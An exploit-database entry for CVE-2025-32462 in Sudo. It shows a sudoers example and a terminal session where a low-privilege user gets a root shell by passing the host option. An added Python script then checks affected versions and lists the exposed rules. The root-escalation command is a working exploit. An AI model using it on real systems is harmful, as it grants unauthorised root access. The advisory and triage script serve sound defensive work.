
9 changes to exploits/shellcodes/ghdb Sudo 1.9.17 Host Option - Elevation of Privilege Sudo chroot 1.9.17 - Local Privilege Escalation Microsoft Defender for Endpoint (MDE) - Elevation of Privilege ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) Discourse 3.2.x - Anonymous Cache Poisoning Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover Microsoft Outlook - Remote Code Execution (RCE) Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
# Date: 2025-06-30
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.sudo.ws
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
# Fixed in: 1.9.17p1
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
# Blog: https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo 1.9.13p2
# CVE : CVE-2025-32462
#
No exploit is required. Executing a sudo or sudoedit command with the host
option referencing an unrelated remote host rule causes Sudo to treat the
rule as valid for the local system. As a result, any command allowed by the
remote host rule can be executed on the local machine.

Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
is allowed to execute all commands (full root) on dev.test.local and
ci.test.local, but not on prod.test.local.

Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local
lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL

Even though the prod.test.local server is explicitly denied for the lowpriv
user, root access is achieved by specifying the host option for the
dev.test.local or ci.test.local servers.

Example

Show that lowpriv is not allowed to execute sudo on the prod server.

lowpriv@prod:~$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.

List the host rules for the dev.test.local server.

lowpriv@prod:~$ sudo -l -h dev.test.local
Matching Defaults entries for lowpriv on dev:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User lowpriv may run the following commands on dev:
(root) NOPASSWD: ALL

Execute a root shell on prod.test.local by specifying the -h dev.test.local
option.

lowpriv@prod:~$ sudo -h dev.test.local -i
sudo: a remote host may only be specified when listing privileges.
root@prod:~# id
uid=0(root) gid=0(root) groups=0(root)
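
For triage, the following added example (not part of the original advisory or of Sudo) checks a version string against the affected ranges listed above and lists the sudoers rules that do not apply to the local host, which are the rules an affected sudo would honour via the host option. The function names are hypothetical and the parser is a simplification: it assumes literal host names, ALL, Host_Alias and "!" only, with no wildcards, IP addresses, netgroups, includes or line continuations.

```python
import re

# Constructed sample input: the sudoers rules quoted in the advisory above.
SUDOERS = """\
Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local
lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL
"""

def is_affected(version):
    """Advisory ranges: 1.8.8 - 1.8.32 and 1.9.0 - 1.9.17; fixed in 1.9.17p1."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {version!r}")
    v = tuple(int(g or 0) for g in m.groups())  # '1.9.15p5' -> (1, 9, 15, 5)
    return (1, 8, 8) <= v[:3] <= (1, 8, 32) or (1, 9, 0, 0) <= v < (1, 9, 17, 1)

def host_match(items, names, aliases):
    """Last matching entry wins and '!' negates; None means no entry names this host."""
    result = None
    for item in items:
        negated = item.startswith("!")
        name = item[1:].strip() if negated else item
        if name == "ALL" or name in names:
            hit = True
        elif name in aliases:
            hit = host_match(aliases[name], names, aliases)
        else:
            hit = None
        if hit is not None:
            result = hit != negated
    return result

def exposed_rules(sudoers, local_names):
    """Rules that do not apply to this host: what an affected sudo honours via -h."""
    # Assumption: simplified sudoers syntax (no wildcards, IPs, netgroups, includes).
    aliases, rules = {}, []
    for line in sudoers.splitlines():
        left, sep, right = line.split("#", 1)[0].partition("=")
        parts = left.split(None, 1)
        if not sep or len(parts) != 2 or parts[0].startswith("Defaults"):
            continue
        hosts = [h.strip() for h in (right if parts[0] == "Host_Alias" else parts[1]).split(",")]
        if parts[0] == "Host_Alias":
            aliases[parts[1].strip()] = hosts
        elif not parts[0].endswith("_Alias"):
            rules.append((parts[0], hosts, right.strip()))
    return [(u, ", ".join(h), c) for u, h, c in rules
            if not host_match(h, local_names, aliases)]
```

On a host running an affected version, every rule this returns should be treated as effective locally until sudo is upgraded to 1.9.17p1 or later.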